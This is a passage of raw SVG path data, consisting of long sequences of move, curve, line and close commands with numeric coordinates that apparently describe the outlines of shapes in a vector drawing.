1079.0653,165.6142 1078.9725,165.87763 1079.55,165.92105 C 1080.1275,165.96447 1081.1278,165.47221 1081.7729,164.82713 z M 677.60309,159.96081 C 679.43301,159.26507 681.27231,159.24788 683.16819,159.90879 C 685.7625,160.81317 686,160.69561 686,158.507 C 686,157.19307 685.5108,155.81569 684.91288,155.44616 C 684.31497,155.07663 684.03867,153.96012 684.29889,152.96503 C 684.58681,151.86403 683.72964,150.1571 682.10925,148.60467 C 679.90677,146.49456 678.9325,146.19245 676.47323,146.85699 C 674.83796,147.29887 672.01107,147.32825 670.19127,146.92227 C 667.28091,146.273 666.47222,146.59444 663.4746,149.59206 C 661.60024,151.46643 659.60827,153 659.04802,153 C 658.48776,153 659.68748,151.48046 661.71405,149.62324 L 665.39873,146.24649 L 662.34063,145.57482 C 660.38918,145.1462 657.78402,145.50273 655.14153,146.56005 C 652.86398,147.47134 649.9269,147.94748 648.61469,147.61814 C 647.10731,147.23981 645.77516,147.56599 644.99666,148.50402 C 643.98847,149.71882 644.1949,150.35266 646.13224,151.99085 C 647.50815,153.15431 649.33779,153.78174 650.5,153.48868 C 651.6,153.21131 653.4,152.75126 654.5,152.46635 C 655.80362,152.1287 657.69758,152.98167 659.93946,154.91609 C 661.83116,156.54836 663.716,157.67552 664.128,157.42089 C 664.53999,157.16627 665.24224,157.59224 665.68854,158.3675 C 667.1008,160.82069 673.19714,161.63594 677.60309,159.96081 z M 800.72038,157.34713 C 801.68512,156.44157 801.61874,156.06767 800.41092,155.60419 C 799.56519,155.27965 799.15332,154.56095 799.49563,154.00706 C 799.83795,153.45318 799.45328,153 798.6408,153 C 795.90098,153 794.12286,154.15659 794.67013,155.58276 C 794.96925,156.36224 794.71583,157 794.10699,157 C 793.49814,157 792.98632,156.2125 792.96959,155.25 C 792.94127,153.62001 792.86695,153.62418 791.88591,155.31074 C 788.79771,160.61983 795.57055,162.181 800.72038,157.34713 z M 716.49281,154.63562 C 717.88823,155.17109 719.33251,152.34703 718.41909,150.86908 C 718.09602,150.34634 716.91392,150.20993 715.7922,150.56595 C 714.67048,150.92197 713.24585,151.29043 712.62635,151.38475 C 710.56198,151.69906 708.96004,153.12633 709.56785,154.10978 C 709.8981,154.64414 711.0868,154.78984 712.20939,154.43354 C 713.74483,153.94621 714.05923,154.12193 713.47853,155.14287 C 712.8788,156.19724 712.98959,156.23857 713.97515,155.32814 C 714.67286,154.68362 715.80581,154.37199 716.49281,154.63562 z M 639.72497,153.32508 C 639.90679,152.77962 638.69306,152.33333 637.02778,152.33333 C 634.09712,152.33333 633.31365,152.98031 634.63916,154.30582 C 635.55892,155.22558 639.33414,154.49757 639.72497,153.32508 z M 687.48276,151.9721 C 687.21039,151.5314 687.50487,150.99838 688.13717,150.78761 C 688.99101,150.503 688.97177,149.81576 688.06238,148.11655 C 687.38895,146.85824 686.57832,146.08834 686.26099,146.40568 C 685.94366,146.72301 685.09983,146.49781 684.38581,145.90523 C 681.79971,143.75895 680.77023,146.12638 683.17479,148.69014 C 684.51368,150.11768 685.35269,152.06794 685.15272,153.28783 C 684.85244,155.11967 685.0201,155.22821 686.39171,154.08987 C 687.26416,153.36581 687.75513,152.41281 687.48276,151.9721 z M 690,154 C 690,152.70609 688.29968,152.70609 687.5,154 C 687.16008,154.55 687.58352,155 688.44098,155 C 689.29844,155 690,154.55 690,154 z M 614.53001,151.95144 C 614.97302,151.23464 615.62447,151.27338 616.58903,152.07389 C 617.67353,152.97395 618,152.96043 618,152.01546 C 618,151.32517 618.66794,151.04234 619.52314,151.37051 C 620.7658,151.84736 620.85139,151.59084 619.98796,149.97749 C 618.15103,146.54517 608.29906,148.00982 609.64423,151.51525 C 610.29819,153.21945 613.56603,153.51119 614.53001,151.95144 z M 642.81955,149.13325 C 643.1309,147.05477 644.49963,146.49902 648.41902,146.85971 C 649.47448,146.95685 652.2274,146.31476 654.53661,145.43287 C 656.84582,144.55097 659.62579,143.9803 660.71431,144.16471 C 661.80284,144.34912 662.87492,144.05 663.09672,143.5 C 663.67649,142.06235 652.07227,141.92143 648.75,143.32578 C 647.2375,143.96512 645.99311,144.94087 645.98469,145.49411 C 645.97562,146.08987 645.66982,146.05312 645.23469,145.40397 C 644.18478,143.83769 639.23937,142.80368 638.50227,143.99633 C 638.1611,144.54835 636.74139,145 635.34736,145 C 633.77432,145 632.63929,145.6639 632.3555,146.75 C 632.0021,148.10251 630.88769,148.48184 627.44912,148.42004 C 625.00211,148.37606 623,148.71032 623,149.16284 C 623,149.61536 624.6875,149.95726 626.75,149.92261 C 628.8125,149.88797 631.85,150.27086 633.5,150.77348 C 638.46937,152.28724 642.4521,151.58629 642.81955,149.13325 z M 1086.7463,148.19425 C 1085.7826,147.03307 1085.4754,147.10809 1084.8674,148.65305 C 1083.682,151.66535 1083.8929,152.08385 1085.9492,150.79968 C 1087.4718,149.84878 1087.6462,149.27864 1086.7463,148.19425 z M 621.75,148.83804 C 621.60329,148.15615 623.02575,147.56139 625.19296,147.39847 C 627.22408,147.24578 630.07743,146.34014 631.53374,145.38594 L 634.18156,143.65102 L 631.52976,142.2616 C 628.26968,140.55347 628.54416,137.6356 632.01022,137.15418 C 633.3796,136.96398 635.0625,136.34638 635.75,135.78174 C 637.274,134.53008 637.41708,130 635.93261,130 C 635.34555,130 635.12584,129.17887 635.44437,128.17527 C 636.24072,125.66619 632.29195,123.58283 628.96164,124.755 C 626.07729,125.77021 625.43045,125.71787 621.6849,124.16621 C 618.10221,122.68201 617.67158,122.70176 618.29323,124.32177 C 618.89626,125.89325 615.37274,128.41212 614.51434,127.0232 C 613.87755,125.99286 610.78185,126.81639 611.38833,127.85478 C 612.14351,129.14777 610.02367,133 608.55698,133 C 607.34355,133 607.24393,133.51138 608.04625,135.62164 C 608.76933,137.52349 608.6939,138.67441 607.7715,139.8136 C 606.78323,141.03412 606.77845,141.21663 607.75,140.63294 C 608.4375,140.2199 609,140.35852 609,140.94098 C 609,141.52344 610.35,142 612,142 C 614.94575,142 615.97115,143.28176 614,144.5 C 612.05866,145.69982 613.03513,147 615.87756,147 C 617.46021,147 619.31531,147.675 620,148.5 C 621.49258,150.29845 622.089,150.41366 621.75,148.83804 z M 637.46884,143.05041 C 637.79279,142.52626 640.25612,142.36143 642.96718,142.68252 C 646.74236,143.12963 648.25624,142.88661 649.51075,141.6321 C 651.2675,139.87536 651.34458,139.91945 645.86478,139.54666 C 644.96541,139.48547 643.50632,138.83517 642.62235,138.10154 C 641.46473,137.1408 639.48088,136.95935 635.53059,137.45291 C 629.56354,138.19844 628.90688,139.4235 633,142.17391 C 635.97178,144.17082 636.6894,144.31157 637.46884,143.05041 z M 1087.3319,142.57756 C 1087.6321,141.79522 1088.77,141.00772 1089.8605,140.82756 C 1091.8309,140.50205 1091.8312,140.47511 1089.8975,136.52172 C 1088.8273,134.33366 1088.0143,131.85866 1088.091,131.02172 C 1088.3728,127.94437 1087.9304,127.5 1084.585,127.5 C 1082.23,127.5 1081.4514,127.83892 1082.0764,128.59201 C 1082.5748,129.19261 1082.8741,129.873 1082.7413,130.10398 C 1082.6086,130.33496 1083.0337,129.9094 1083.6861,129.15828 C 1084.9673,127.683 1085.0029,127.90814 1085.1999,138.75 C 1085.2923,143.83878 1086.2134,145.49231 1087.3319,142.57756 z M 667.64637,139.23907 C 670.00382,137.52179 670.2276,136.97917 669.12588,135.65168 C 668.41195,134.79144 668.11812,133.6179 668.47293,133.0438 C 668.82774,132.46971 668.58638,132 667.93657,132 C 667.10672,132 667.06277,131.628 667.7889,130.75 C 668.35748,130.0625 668.60626,128.375 668.34174,127 C 667.88487,124.62514 667.52641,124.50223 661.1804,124.54458 C 657.50618,124.5691 653.41563,124.21541 652.09028,123.75861 C 650.64983,123.26213 647.43199,123.42433 644.09028,124.16188 C 638.37914,125.42238 635.35139,127.7022 637.06732,129.45 C 637.58029,129.9725 638,131.19963 638,132.17695 C 638,133.15427 639.2375,134.74137 640.75,135.70385 C 642.2625,136.66632 643.83061,137.9142 644.23469,138.4769 C 644.71427,139.14474 644.97469,139.09846 644.98469,138.3436 C 644.99607,137.48421 645.89892,137.46309 648.5,138.26138 C 650.425,138.85218 652,139.75821 652,140.27477 C 652,140.79133 652.66059,140.96049 653.46797,140.65066 C 654.27536,140.34084 655.13192,140.40519 655.37143,140.79367 C 656.30877,142.31401 664.9228,141.22305 667.64637,139.23907 z M 606,133 C 606,132.45 606.92656,132 608.05902,132 C 609.19148,132 609.85914,131.58109 609.54271,131.0691 C 609.22627,130.5571 609.43206,129.85101 610,129.5 C 610.56794,129.14899 610.79984,128.48514 610.51532,128.02478 C 609.79721,126.86286 606.02244,127.97308 606.28576,129.26875 C 606.40359,129.84856 605.6,130.58779 604.5,130.91147 C 601.84053,131.69406 601.46723,134 604,134 C 605.1,134 606,133.55 606,133 z M 694.37543,132.51624 C 695.45796,131.6965 695.9997,130.44161 695.65681,129.54804 C 695.21389,128.39382 695.75437,127.97992 697.78138,127.92105 C 699.27662,127.87763 699.91193,127.60661 699.19318,127.31878 C 696.72081,126.3287 693.49219,122.39833 693.80727,120.76223 C 694.05815,119.45955 693.30939,119.13489 690.15458,119.17843 C 687.97205,119.20855 685.7255,118.94839 685.16227,118.60029 C 684.59903,118.25219 683.86769,118.40506 683.53707,118.94001 C 683.20646,119.47497 682.20154,119.63083 681.30393,119.28639 C 680.17213,118.85207 679.90628,119.03934 680.43657,119.89737 C 680.92887,120.69392 680.45302,121.33028 679.10062,121.68394 C 677.94528,121.98607 677,122.81622 677,123.52873 C 677,124.25405 675.29305,125.11259 673.12157,125.47946 C 669.55806,126.08151 669.26216,126.37654 669.47741,129.11285 L 669.71169,132.09099 L 679.0673,132.59029 C 684.21289,132.8649 688.62776,133.29443 688.87813,133.54479 C 689.76621,134.43287 692.52633,133.91645 694.37543,132.51624 z M 635.08234,123.18265 C 635.81764,124.49656 636.72906,124.58638 640.72957,123.73921 C 643.35331,123.1836 647.525,122.60166 650,122.44601 C 657.39087,121.98122 658.87946,121.16135 660.0195,116.9276 C 660.58867,114.81386 661.5228,112.79493 662.09535,112.44107 C 662.6679,112.08722 662.89479,111.16822 662.59956,110.39885 C 661.73511,108.14614 663.82987,108.78912 666.18695,111.5 C 667.3825,112.875 668.95452,114 669.68034,114 C 671.6357,114 671.28141,111.02567 669.25,110.38726 C 668.2875,110.08478 666.375,109.35184 665,108.7585 C 662.57604,107.71253 662.62927,107.65238 666.75,106.78101 C 669.0875,106.28672 671,105.45021 671,104.9221 C 671,104.39399 669.93969,104.22802 668.64376,104.55328 C 667.23844,104.90599 665.72142,104.57856 664.88483,103.74197 C 664.11335,102.97049 662.92366,102.52545 662.24107,102.75298 C 661.55848,102.98051 660.97407,102.79167 660.94238,102.33333 C 660.9107,101.875 660.71538,99.903531 660.50834,97.952291 C 660.02842,93.429076 660.45452,92.869757 666.5,90.087438 C 673.19136,87.007863 674.49083,85.927846 672.79733,84.853584 C 670.84995,83.618269 665.81006,83.899005 663.1149,85.392922 C 661.44811,86.316816 661.09668,86.941716 661.94798,87.467853 C 663.36671,88.344675 658.01476,91.979506 655.22583,92.033269 C 653.12117,92.073841 649.69872,94.825909 648.14682,97.725663 C 646.68843,100.4507 646.70546,100.99476 648.25,101.02224 C 648.9375,101.03447 650.4634,101.82197 651.64089,102.77224 L 653.78178,104.5 L 651.17338,107 C 649.73876,108.375 648.43786,109.3875 648.28249,109.25 C 647.34117,108.41694 646.15458,109.30086 645.65629,111.20633 C 645.01437,113.66107 643.77718,113.01033 643.31384,109.97423 C 643.11283,108.65708 643.59291,107.98893 644.75627,107.96673 C 648.57368,107.8939 652.33325,102.8409 648.91667,102.375 C 648.4125,102.30625 647.55,102.19375 647,102.125 C 645.67184,101.95898 645.72971,98.687337 647.11456,95.647909 C 647.88731,93.951913 649.80406,92.703339 653.36456,91.576657 C 659.94986,89.492808 661.60231,88.49028 660.04162,87.525723 C 657.98892,86.257085 661.95177,83 665.548,83 C 667.50375,83 669.01396,82.405994 669.36163,81.5 C 669.67821,80.675 669.44887,80 668.85198,80 C 668.2551,80 668.00258,79.098123 668.29084,77.995829 C 668.69692,76.442969 668.21652,75.861387 666.15747,75.413153 C 664.69586,75.094976 662.2625,74.445262 660.75,73.969344 C 659.07541,73.442424 658,73.474755 658,74.05202 C 658,74.573409 656.22656,75 654.05902,75 C 651.89148,75 649.85207,75.430347 649.52699,75.956326 C 649.20192,76.482305 648.26963,76.656961 647.45524,76.34445 C 646.64085,76.031939 645.30526,76.331693 644.48727,77.010569 C 643.29391,78.000969 642.99697,77.973674 642.98469,76.872445 C 642.97266,75.794458 642.7614,75.821825 642,77 C 641.46684,77.825 641.03063,78.95 641.03063,79.5 C 641.03063,80.05 641.41748,79.889457 641.89031,79.143237 C 642.44258,78.271646 642.97869,78.156502 643.38952,78.821241 C 643.74126,79.390362 643.11597,80.145804 642,80.5 C 640.88403,80.854196 640.22905,81.561594 640.5445,82.071996 C 640.85994,82.582398 640.24396,83 639.17565,83 C 637.18939,83 635.64552,85.998547 635.9577,89.25 C 636.08365,90.561876 635.4215,90.975044 633.31286,90.90032 L 630.5,90.80064 L 633,90 C 634.375,89.559648 634.86776,89.154504 634.09501,89.09968 C 632.96793,89.019716 633.01737,88.638283 634.34501,87.171259 C 635.25526,86.165452 636,84.574619 636,83.636076 C 636,82.279536 635.61686,82.134681 634.13148,82.929632 C 633.1038,83.479632 631.95501,83.621681 631.57863,83.245297 C 631.20225,82.868912 631.17562,83.294091 631.51947,84.190139 C 631.93932,85.284262 631.48085,86.029996 630.12347,86.460811 C 629.01183,86.813633 627.8359,87.941675 627.51029,88.967571 C 626.91169,90.853592 621.44939,93.395772 619.96575,92.478833 C 619.52327,92.205364 618.55175,92.548254 617.80681,93.240809 C 617.06187,93.933364 615.8713,94.622266 615.16108,94.771703 C 614.45087,94.92114 612.88658,95.961435 611.68489,97.083471 C 610.19807,98.471736 610.02681,98.92227 611.14885,98.493594 C 612.05572,98.147126 613.09674,98.347509 613.46223,98.938889 C 613.82772,99.530269 613.42583,100.2831 612.56913,100.61185 C 611.71242,100.94059 611.23132,101.56526 611.5,102 C 611.76868,102.43474 611.32368,103.04555 610.51112,103.35736 C 609.67609,103.67779 609.2889,104.58929 609.62061,105.45372 C 609.96306,106.34612 609.54192,107.23855 608.6095,107.59636 C 605.85636,108.65283 607.93513,110 612.31847,110 C 615.49213,110 616.837,109.49065 617.82019,107.91632 C 618.53589,106.77029 619.7319,106.06688 620.47798,106.35317 C 621.22405,106.63947 622.0826,106.22713 622.38586,105.43686 C 622.68911,104.64659 623.42791,104 624.02763,104 C 624.62735,104 624.86906,104.40285 624.56476,104.89522 C 624.26046,105.38758 624.6839,106.04846 625.50574,106.36383 C 626.4134,106.71213 627,106.3607 627,105.46862 C 627,104.66088 627.675,104 628.5,104 C 630.30819,104 630.43321,102.83321 628.8,101.2 C 627.86667,100.26667 628.03333,99.993243 629.55,99.969591 C 631.18448,99.944103 631.25064,99.793173 629.95891,99.036816 C 628.34885,98.094061 627.37602,91.504235 628.72374,90.669979 C 629.15068,90.405697 629.43444,91.916703 629.3543,94.027769 C 629.25561,96.62759 629.69528,98.052827 630.71692,98.444868 C 631.84866,98.879154 631.94962,99.355779 631.1213,100.35384 C 630.51413,101.08544 630.3182,101.98487 630.6859,102.35257 C 631.05361,102.72027 630.3747,103.9339 629.17723,105.04952 C 626.44207,107.5977 626.45619,107.91956 629.5,112.40486 C 630.875,114.43104 632,116.75796 632,117.57579 C 632,119.80409 635.08404,120.60121 636.17348,118.65449 C 636.68273,117.74452 638.24415,117 639.64331,117 C 641.24775,117 642.36029,116.33824 642.65583,115.20812 C 642.91355,114.22258 644.00268,113.35008 645.07611,113.26922 C 646.88728,113.13279 646.91742,113.27982 645.49465,115.3111 C 643.91128,117.57167 643.69216,117.66539 639.5,117.875 C 638.02493,117.94875 637,118.60209 637,119.46862 C 637,120.36321 637.58629,120.71225 638.5,120.36163 C 639.325,120.04504 640,120.28417 640,120.89301 C 640,122.17799 639.88964,122.18146 634.17253,121.07656 C 630.83158,120.43087 629.72434,120.55479 629.31554,121.62011 C 629.0243,122.37905 628.15917,123 627.39301,123 C 626.62686,123 626,123.4138 626,123.91955 C 626,124.42531 627.84625,124.11388 630.10277,123.2275 C 633.82049,121.76713 634.28782,121.76293 635.08234,123.18265 z M 649.18689,113.25 C 649.37034,112.2875 650.57828,111.34966 651.87121,111.1659 C 653.44727,110.94191 653.98729,111.21155 653.50984,111.98408 C 653.11816,112.61783 652.19113,112.90359 651.44978,112.6191 C 650.58249,112.28629 650.30013,112.61856 650.65792,113.55093 C 650.96375,114.34792 650.68284,115 650.03366,115 C 649.38449,115 649.00344,114.2125 649.18689,113.25 z M 656,104 C 655.20686,103.50981 654.88989,102.77678 655.29563,102.37104 C 655.70137,101.9653 656.55833,102.15833 657.2,102.8 C 658.71091,104.31091 657.86759,105.15423 656,104 z M 676.61048,122.24654 C 677.33973,121.28594 677.9507,120.15136 677.9682,119.72525 C 678.0622,117.43516 662.02721,116.46337 661.26755,118.71312 C 661.04225,119.38033 661.98177,120.2083 663.35536,120.55305 C 664.72896,120.8978 666.66309,122.07522 667.65342,123.16953 C 669.78119,125.52068 674.49351,125.0351 676.61048,122.24654 z M 665.42974,123.11369 C 666.14055,121.96357 662.5726,121.0375 660.01125,121.70731 C 658.91743,121.99335 658.26899,122.62622 658.57026,123.11369 C 659.28201,124.26532 664.71799,124.26532 665.42974,123.11369 z M 1069.1276,122.25 C 1070.3714,120.66394 1070.3361,120.62857 1068.75,121.87244 C 1067.7875,122.62729 1067,123.41479 1067,123.62244 C 1067,124.44548 1067.8212,123.91575 1069.1276,122.25 z M 624.49292,122.01145 C 624.84326,121.44459 624.44186,121.27695 623.55194,121.61844 C 621.81952,122.28323 621.50255,123 622.94098,123 C 623.45852,123 624.1569,122.55515 624.49292,122.01145 z M 619,119.89159 C 619,118.1561 619.43133,117.89144 621.43871,118.39526 C 622.84625,118.74853 624.18009,118.51762 624.59322,117.84916 C 625.06007,117.09379 624.86861,116.96317 624.04271,117.47361 C 622.231,118.5933 620.84151,115.90041 622.3072,114.11012 C 623.31155,112.88335 623.10503,112.7574 621,113.31293 C 619.625,113.6758 617.8625,113.97884 617.08333,113.98635 C 616.30417,113.99386 615.96276,114.2961 616.32466,114.65799 C 616.68655,115.01989 616.42405,115.99307 615.74132,116.82061 C 614.75226,118.01948 614.75402,118.41074 615.75,118.74595 C 616.4375,118.97735 617,119.80417 617,120.58333 C 617,121.3625 617.45,122 618,122 C 618.55,122 619,121.05122 619,119.89159 z M 683.58262,117.75071 C 684.64242,116.69091 681.8817,112.83142 680.45533,113.37877 C 679.69013,113.6724 678.79808,113.48231 678.47301,112.95633 C 677.52691,111.42551 672.27409,111.84336 671.63837,113.5 C 671.02721,115.09267 667,115.61968 667,114.10699 C 667,112.41359 664.05414,112.08872 662.52894,113.61392 C 660.01692,116.12594 660.68552,116.50027 667.67345,116.49423 C 671.34378,116.49106 675.28126,116.98557 676.42339,117.59315 C 678.53416,118.71601 682.52939,118.80394 683.58262,117.75071 z M 682.21959,108.95719 C 682.45436,107.35758 682.1635,105.84836 681.57322,105.60336 C 680.98295,105.35835 681.175,105.08794 682,105.00244 C 686.97234,104.48711 689.86486,103.09655 686.41667,102.87917 C 681.80652,102.58852 673.0728,103.6342 672.08333,104.59529 C 671.85417,104.81788 673.65417,105.06742 676.08333,105.14983 C 679.25475,105.25742 679.65417,105.40522 677.5,105.67404 C 671.74874,106.39175 670,107.04779 670,108.48767 C 670,109.42884 670.58362,109.71328 671.66404,109.29868 C 672.78293,108.86932 673.09121,109.04341 672.60503,109.83006 C 672.11434,110.62401 672.8461,111 674.88197,111 C 676.53197,111 678.14793,111.43035 678.47301,111.95633 C 679.55067,113.70002 681.78613,111.91053 682.21959,108.95719 z M 682.3784,101.43627 C 685.42157,100.88444 691.19493,98.133965 694.49001,95.666199 C 696.43894,94.206598 696.42362,94.150137 693.74782,92.930963 C 691.71534,92.004899 691.28321,91.363679 692.06047,90.427144 C 692.82878,89.50138 692.58694,89.003674 691.14665,88.546543 C 689.18181,87.92293 688.90764,86.53777 690.30613,84.300173 C 690.76332,83.56867 690.19025,82.637002 688.83796,81.913277 L 686.6199,80.726207 L 688.78412,78.973726 L 690.94834,77.221244 L 687.97417,75.989302 C 684.48356,74.543443 684.36953,74.053856 686.89258,71.345676 C 688.7809,69.318802 688.77358,69.31531 683.64258,69.7945 C 680.81416,70.058649 678.38018,70.550448 678.23374,70.887386 C 677.0614,73.584765 675.72591,74.388607 672.5657,74.299028 C 669.20639,74.203805 669.03139,74.353573 669.58636,76.848931 C 669.91064,78.307019 670.16652,80.25837 670.155,81.185266 C 670.14184,82.244141 671.2242,83.109969 673.06703,83.514721 C 675.80436,84.115941 677.32476,87 674.90437,87 C 674.30177,87 672.58268,87.873031 671.08417,88.940068 C 669.58565,90.007105 667.7269,91.019605 666.95361,91.190068 C 666.18031,91.360531 664.98244,92.022321 664.29167,92.660714 C 663.60089,93.299107 662.51315,93.995617 661.87446,94.208514 C 660.9976,94.500799 661.00455,95.139992 661.90285,96.818466 C 662.55715,98.041043 662.83064,99.465011 662.51061,99.98284 C 660.98904,102.44478 672.26697,103.26982 682.3784,101.43627 z M 610,101.16667 C 610,100.70833 609.325,100.33333 608.5,100.33333 C 607.675,100.33333 607,100.70833 607,101.16667 C 607,101.625 607.675,102 608.5,102 C 609.325,102 610,101.625 610,101.16667 z M 718.5,87 C 717.70032,85.706093 716,85.706093 716,87 C 716,87.55 716.70156,88 717.55902,88 C 718.41648,88 718.83992,87.55 718.5,87 z M 639.7823,80.154497 C 640.06888,79.29387 639.58805,78.933502 638.44803,79.154497 C 637.46777,79.344523 636.46412,80.105477 636.2177,80.845503 C 635.93112,81.70613 636.41195,82.066498 637.55197,81.845503 C 638.53223,81.655477 639.53588,80.894523 639.7823,80.154497 z M 841.95,79.966731 C 844.4207,79.913699 847.58111,76.702354 847.57606,74.25 C 847.57351,73.0125 847.46932,72 847.34453,72 C 846.74975,72 838,81.077234 838,81.694276 C 838,82.082424 838.54,81.86 839.2,81.2 C 839.86,80.54 841.0975,79.985029 841.95,79.966731 z M 743.36163,77.5 C 743.68001,76.670308 745.18015,75.993157 746.71862,75.984687 C 748.88185,75.972778 749.16663,75.753935 748,75 C 746.09037,73.765903 742,73.710146 742,74.918213 C 742,75.423229 741.72686,76.548229 741.39301,77.418213 C 741.05917,78.288196 741.23602,79 741.78602,79 C 742.33602,79 743.04504,78.325 743.36163,77.5 z M 774,73.440983 C 774,73.198442 773.29844,73 772.44098,73 C 771.58352,73 771.16462,73.45734 771.51008,74.016312 C 772.08089,74.939894 774,74.496458 774,73.440983 z M 657.64832,72.494541 C 658.98893,71.153928 658.89898,71.036292 656.82689,71.42023 C 655.5471,71.657363 653.2625,71.884819 651.75,71.92569 C 650.2375,71.96656 649,72.45 649,73 C 649,74.574177 655.97642,74.166433 657.64832,72.494541 z M 676.80627,71.165257 C 677.87494,69.555752 679.30348,68.979737 682.37197,68.921053 C 684.64239,68.877632 685.825,68.585157 685,68.271109 C 684.175,67.95706 683.16939,67.205087 682.76531,66.600056 C 682.26853,65.856219 682.02567,65.930503 682.01531,66.829455 C 682.00442,67.775281 681.16179,67.974808 679.0952,67.520909 C 677.42889,67.154926 675.91147,67.33423 675.53618,67.941454 C 674.57002,69.504737 672.69831,69.228582 673.31782,67.614154 C 673.74869,66.491315 673.26226,66.521324 670.75466,67.772276 C 669.05244,68.621458 666.04877,69.428119 664.07985,69.564856 C 659.16714,69.906032 659.18988,69.884023 662,71.577151 L 664.5,73.08343 L 662,72.476209 C 660.43994,72.097288 659.96962,72.197572 660.74908,72.742939 C 661.43607,73.223613 665.0065,73.552456 668.68337,73.473702 C 674.33893,73.352567 675.59002,72.997019 676.80627,71.165257 z M 742.25,403.96969 C 741.0125,403.47181 739.98025,402.26245 739.95611,401.28222 C 739.93197,400.302 739.26869,397.7 738.48215,395.5 C 737.13052,391.71938 737.18103,391.31817 739.40312,388.18464 C 741.46441,385.27788 741.63109,384.38442 740.75556,380.93512 C 739.43695,375.74018 741.03911,371.89646 745.27474,370.09324 C 749.0989,368.46519 754,364.13606 754,362.38623 C 754,361.70446 754.78669,360.99515 755.7482,360.80997 C 756.70972,360.6248 757.49722,359.61805 757.4982,358.57274 C 757.50334,353.14023 762.64527,359.94007 763.11458,366 C 763.36877,369.28216 762.03195,374 760.84776,374 C 760.33327,374 760.02062,374.5625 760.15297,375.25 C 760.28533,375.9375 758.47234,382.41629 756.1241,389.64732 C 752.5787,400.56483 751.48531,402.87505 749.67729,403.26873 C 748.47978,403.52947 746.825,403.99754 746,404.30887 C 745.175,404.62021 743.4875,404.46758 742.25,403.96969 z M 747.70295,402.77035 C 749.24133,402.09405 750.83587,401.08155 751.24638,400.52035 C 752.38905,398.95825 759.38638,376.65987 759.15267,375.32541 C 759.03953,374.67938 759.41055,373.8643 759.97715,373.51412 C 760.54888,373.16077 760.71659,371.71898 760.35399,370.27429 C 759.83779,368.21757 760.01532,367.7919 761.19974,368.24641 C 762.44744,368.72519 762.57591,368.14939 761.96579,364.81292 C 761.56261,362.6081 760.44198,360.06073 759.4755,359.15208 C 758.50902,358.24344 758.01663,358.03567 758.38131,358.69039 C 758.74598,359.3451 758.16366,360.70126 757.08727,361.70407 C 756.01088,362.70688 754.64465,364.80445 754.0512,366.36534 C 753.33661,368.24485 752.47436,369.01227 751.4981,368.63764 C 750.68734,368.32653 750.13109,368.58034 750.262,369.20168 C 750.3929,369.82302 748.94698,370.66851 747.04886,371.08054 C 741.52863,372.27881 739.72045,376.09759 742.14925,381.42822 C 743.13345,383.5883 742.9305,384.50664 740.73608,387.82263 C 738.20625,391.64545 738.19401,391.75708 739.77372,396.59736 C 740.65375,399.29381 742.07718,402.04819 742.93689,402.7182 C 744.87289,404.227 744.40128,404.22184 747.70295,402.77035 z M 1168.5,391.83574 C 1165.8803,390.39041 1161,385.84102 1161,384.84429 C 1161,384.41446 1161.6608,384.31633 1162.4684,384.62624 C 1163.276,384.93615 1163.8385,385.70953 1163.7184,386.34486 C 1163.5983,386.98019 1164.2875,387.36777 1165.25,387.20616 C 1166.2125,387.04455 1167,387.32746 1167,387.83484 C 1167,388.34223 1168.35,389.31655 1170,390 C 1173.0226,391.25199 1174.068,393.02598 1171.75,392.96959 C 1171.0625,392.95287 1169.6,392.44264 1168.5,391.83574 z M 988,391.16017 C 988,390.23033 996.41648,385.85089 997.66576,386.13068 C 998.12459,386.23344 999.175,386.04329 1000,385.70813 C 1000.825,385.37297 1003.4626,384.5957 1005.8612,383.98088 C 1010.1784,382.87429 1015.219,378.70898 1014.7989,376.59507 C 1014.3908,374.54109 1017.4757,371 1019.6732,371 C 1020.9773,371 1022.119,370.20044 1022.4918,369.02598 C 1023.1183,367.05175 1027.0099,363.86174 1030.1862,362.7186 C 1031.1557,362.36967 1032.9846,362.98663 1034.4893,364.17025 C 1036.3944,365.66878 1037.9298,366.06405 1040.1335,365.6233 C 1042.3009,365.18982 1043.042,365.37037 1042.7426,366.25893 C 1042.5127,366.94152 1041.3755,367.51352 1040.2156,367.53004 C 1039.0556,367.54656 1037.7826,367.88406 1037.3866,368.28004 C 1036.0817,369.585 1035,369.03161 1035,367.05902 C 1035,365.99148 1034.5228,364.82313 1033.9396,364.4627 C 1032.313,363.45737 1027.1413,365.97954 1026.4659,368.10755 C 1026.1355,369.1484 1025.4455,370 1024.9326,370 C 1024.4197,370 1024.1125,370.5625 1024.25,371.25 C 1024.3875,371.9375 1023.7173,372.43831 1022.7608,372.3629 C 1021.8042,372.2875 1021.2704,372.62845 1021.5745,373.12058 C 1021.8787,373.6127 1021.4497,374.69316 1020.6212,375.52161 C 1019.2796,376.8633 1019.0138,376.84712 1018.1892,375.37354 C 1017.1333,373.48681 1014.8239,374.37764 1015.5907,376.37588 C 1016.4498,378.61464 1010.6785,383.74428 1005.9301,384.96233 C 1003.4935,385.58736 1000.825,386.36913 1000,386.6996 C 999.175,387.03008 997.7382,387.45111 996.8071,387.63524 C 995.87601,387.81937 993.51351,388.86908 991.5571,389.96793 C 989.6007,391.06677 988,391.60328 988,391.16017 z M 1175,390 C 1175,389.45 1175.45,389 1176,389 C 1176.55,389 1177,389.45 1177,390 C 1177,390.55 1176.55,391 1176,391 C 1175.45,391 1175,390.55 1175,390 z M 780.45888,388.93347 C 780.09635,388.34688 780.03985,387.62682 780.33333,387.33333 C 781.04965,386.61702 783,387.87916 783,389.05902 C 783,390.33699 781.27359,390.25169 780.45888,388.93347 z M 1172,388.05902 C 1172,387.54148 1172.45,386.83992 1173,386.5 C 1173.55,386.16008 1174,386.58352 1174,387.44098 C 1174,388.29844 1173.55,389 1173,389 C 1172.45,389 1172,388.57656 1172,388.05902 z M 787.125,386.125 C 787.54325,384.87026 789,384.57891 789,385.75 C 789,386.1625 788.49375,386.66875 787.875,386.875 C 787.25625,387.08125 786.91875,386.74375 787.125,386.125 z M 1180,383.05902 C 1180,382.47656 1180.45,382 1181,382 C 1182.2814,382 1182.2814,382.70806 1181,383.5 C 1180.45,383.83992 1180,383.64148 1180,383.05902 z M 1210.5,381 C 1211.2997,379.70609 1213,379.70609 1213,381 C 1213,381.55 1212.2984,382 1211.441,382 C 1210.5835,382 1210.1601,381.55 1210.5,381 z M 1179,380 C 1179,378.71862 1179.7081,378.71862 1180.5,380 C 1180.8399,380.55 1180.6415,381 1180.059,381 C 1179.4766,381 1179,380.55 1179,380 z M 1208.5353,378.05719 C 1207.5854,376.52015 1208.8247,375 1211.0276,375 C 1212.1458,375 1212.7382,374.48126 1212.4569,373.74835 C 1212.1666,372.99168 1213.3654,372.06203 1215.4883,371.39756 C 